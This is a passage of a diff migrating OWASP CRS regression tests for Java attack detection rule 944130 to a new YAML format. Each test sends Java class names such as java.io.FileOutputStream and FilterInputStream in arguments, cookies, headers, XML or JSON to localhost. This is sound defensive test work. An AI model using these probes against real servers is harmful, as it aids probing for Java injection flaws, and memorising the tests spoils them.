java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 105 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 106 desc: "XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 107 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 108 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 109 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FileOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 110 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FileOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 111 desc: "Argument test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 112 desc: "Argument name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 113 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 114 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 115 desc: "Request header test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 116 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 117 desc: "XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 118 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 119 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 120 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 121 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 122 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 123 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 124 desc: "Cookie test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 125 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 126 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 127 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 128 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 129 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 130 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 